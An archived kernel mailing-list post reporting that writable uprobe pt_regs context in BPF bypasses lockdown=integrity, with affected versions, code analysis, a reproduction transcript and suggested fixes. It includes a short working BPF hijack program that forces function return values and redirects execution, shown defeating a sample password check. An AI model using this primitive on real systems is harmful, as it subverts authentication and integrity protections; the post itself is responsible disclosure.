All of lore.kernel.org
 help / color / mirror / Atom feed
* BPF: writable uprobe pt_regs context bypasses lockdown=integrity
@ 2026-04-27 12:39 Xavier Brouckaert (xabrouck)
  2026-04-27 13:42 ` Greg KH
                   ` (3 more replies)
  0 siblings, 4 replies; 7+ messages in thread
From: Xavier Brouckaert (xabrouck) @ 2026-04-27 12:39 UTC (permalink / raw)
  To: bpf@vger.kernel.org; +Cc: security@kernel.org


[-- Attachment #1.1: Type: text/plain, Size: 6946 bytes --]

Summary
-------
Kernels that permit BPF_PROG_TYPE_KPROBE programs attached as uprobes to
store to their pt_regs context allow a CAP_BPF+CAP_PERFMON (or root)
user to redirect control flow (set ip/sp/any GPR) in arbitrary userspace
processes. This is not gated by the lockdown LSM: under
lockdown=integrity, bpf_probe_write_user() is correctly refused via
LOCKDOWN_BPF_WRITE_USER, but the strictly more powerful direct-ctx-store
path is not, because lockdown's BPF hooks are implemented per-helper and
this primitive uses no helper.

Net effect: on a lockdown=integrity system, root can hijack execution in
sshd, libpam, signature verifiers, etc., with no ptrace, no text
modification on disk, and no helper that lockdown currently inspects.
This appears to violate the integrity-mode guarantee in the same way
that motivated LOCKDOWN_BPF_WRITE_USER.

Affected
--------
Reproduced on:
  - torvalds/master at dd6c438c3 ("Merge tag 'vfs-7.1-rc1.fixes'"),
    built and booted as 7.0.0+ (x86_64, lockdown=integrity) -- full PoC
    succeeds, transcript below.
  - 6.18.5 (Debian/Kali 6.18.5-1kali1, x86_64).

Relevant code in master:

  kernel/trace/bpf_trace.c: kprobe_prog_is_valid_access()
    if (type == BPF_WRITE)
        prog->aux->kprobe_write_ctx = true;
    return true;
  -- no offset restriction (ip/sp permitted), no security_locked_down().

  kernel/events/core.c: perf_event_set_bpf_prog()
    /* Writing to context allowed only for uprobes. */
    if (prog->aux->kprobe_write_ctx && !is_uprobe)
        return -EINVAL;
  -- restricts to uprobe attach, no lockdown check.

  kernel/trace/bpf_trace.c: bpf_kprobe_multi_link_attach()
    if (prog->aux->kprobe_write_ctx) return -EINVAL;
  -- kprobe_multi path correctly refuses.

  kernel/bpf/syscall.c: bpf_tracing_prog_attach()
  -- freplace smuggling into kprobes was separately found and closed
     in 611fe4b79af7 ("bpf: Fix abuse of kprobe_write_ctx via
     freplace", 2026-03-31). The lockdown interaction was not
     addressed in that series.

So the feature is deliberately fenced to uprobes (kernel pt_regs are
protected), but nothing in the load or attach path consults
security_locked_down(). LOCKDOWN_BPF_WRITE_USER is checked only in
bpf_tracing_func_proto() for the bpf_probe_write_user helper.

Introduced in 7384893d970e ("bpf: Allow uprobe program to change
context registers", Jiri Olsa, 2025-09-16) and 4363264111e1 ("uprobe:
Do not emulate/sstep original instruction when ip is changed"), merged
for v6.18 via ae28ed4578e6. So affected range is v6.18 .. current.

The feature is consumed in the wild by Cilium Tetragon's
`action: Override` / `argRegs` mechanism (see
pkg/bpf/detect_linux.go:HasUprobeRegsChange() and
pkg/selectors/kernel_regs_amd64.go in the tetragon tree), which is how
I encountered it.

Reproduction
------------
1. Enable lockdown:

     # echo integrity > /sys/kernel/security/lockdown
     # cat /sys/kernel/security/lockdown
     none [integrity] confidentiality

2. Positive control -- confirm bpf_probe_write_user is refused:

     # dmesg | tail
     Lockdown: ...: use of bpf to write user RAM is restricted;
       see man kernel_lockdown.7

3. Build and run the attached PoC (victim.c, regwrite.bpf.c,
   regwrite.c, Makefile -- standard libbpf skeleton):

     $ ./victim wrong          # prints "denied" once per second
     # ./regwrite ./victim check_password

   Observed: verifier accepts the program; uprobe attaches; victim
   output flips from "denied" to "AUTH OK" with no restart. Detach
   (^C) reverts cleanly. No lockdown denial is logged.

   Transcript from torvalds/master @ dd6c438c3:

     $ uname -a && cat /sys/kernel/security/lockdown && ./victim wrong
     Linux ... 7.0.0+ #2 SMP PREEMPT_DYNAMIC Fri Apr 24 05:27:53 EDT 2026 x86_64 GNU/Linux
     none [integrity] confidentiality
     denied
     denied
     AUTH OK          <-- regwrite attached here
     AUTH OK
     AUTH OK
     denied           <-- regwrite ^C detached here
     denied

     # ./regwrite ./victim check_password
     ...
     libbpf: prog 'hijack': relo #1: <byte_off> [2] struct pt_regs.ax (0:10 @ offset 80)
     libbpf: prog 'hijack': relo #2: <byte_off> [2] struct pt_regs.ip (0:16 @ offset 128)
     libbpf: prog 'hijack': relo #3: <byte_off> [2] struct pt_regs.sp (0:19 @ offset 152)
     ...
     libbpf: elf: symbol address match for 'check_password' in './victim': 0x1159
     [+] attached to ./victim:check_password - hook is live in ALL pids.

The relevant BPF program body is three context stores and nothing else:

    SEC("uprobe")
    int BPF_UPROBE(hijack)
    {
        struct pt_regs *r = (struct pt_regs *)ctx;
        __u64 rsp = PT_REGS_SP(r), ra = 0;
        bpf_probe_read_user(&ra, sizeof(ra), (void *)rsp);
        r->ax = 1;          /* forced return value      */
        r->ip = ra;         /* jump to caller           */
        r->sp = rsp + 8;    /* pop the return address   */
        return 0;
    }

Impact
------
Under lockdown=integrity, root retains the ability to:
  - force arbitrary return values from any userspace function
    (auth checks, signature verification, policy decisions);
  - redirect rip to arbitrary mapped text (ROP/JOP entry);
  - do so with no ptrace, no PTRACE_POKETEXT, no /proc/pid/mem,
    no bpf_probe_write_user, no persistent .text modification.

The only userspace-visible artefact while the probe is armed is a
4 KiB Anonymous/Private_Dirty page in the target's r-xp VMA
(uprobe's CoW for the int3); this reverts to zero on detach via the
__replace_page(NULL) path in uprobe_write_opcode(), so it is a
presence signal only.

This is strictly more capable than bpf_probe_write_user (which can
corrupt data but not directly set ip), and is reached with the same
privilege, yet only the weaker primitive is lockdown-gated.

Suggested fix
-------------
Gate writable kprobe/uprobe context behind security_locked_down() at
the point the verifier permits the store. Two reasonable shapes:

(a) In kprobe_prog_is_valid_access() (kernel/trace/bpf_trace.c),
    when type == BPF_WRITE, call
    security_locked_down(LOCKDOWN_BPF_WRITE_USER) and return false
    if denied. This reuses the existing reason and matches the
    intent ("BPF writing to user state"). One line, adjacent to the
    kprobe_write_ctx flag set.

(b) Introduce a dedicated LOCKDOWN_BPF_WRITE_REGS reason at
    LOCKDOWN_INTEGRITY_MAX scope, for clearer audit messages, and
    check it in the same place.

Either way the check belongs at verify/load time rather than attach
time, so the program is refused outright rather than attaching as a
no-op.

Orthogonally, a CONFIG_BPF_UPROBE_OVERRIDE knob (mirroring
CONFIG_BPF_KPROBE_OVERRIDE for bpf_override_return) would let
distributions opt out independent of lockdown.

thanks,
X.


[-- Attachment #1.2: Type: text/html, Size: 27726 bytes --]

[-- Attachment #2: regwrite-poc.tar.gz --]
[-- Type: application/x-gzip, Size: 3697 bytes --]

^ permalink raw reply	[flat|nested] 7+ messages in thread

end of thread, other threads:[~2026-04-27 14:56 UTC | newest]

Thread overview: 7+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-04-27 12:39 BPF: writable uprobe pt_regs context bypasses lockdown=integrity Xavier Brouckaert (xabrouck)
2026-04-27 13:42 ` Greg KH
2026-04-27 13:43 ` Greg KH
2026-04-27 14:09 ` Jiri Olsa
2026-04-27 14:16   ` Alexei Starovoitov
2026-04-27 14:25 ` Nicolas Bouchinet
2026-04-27 14:56   ` Daniel Borkmann

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.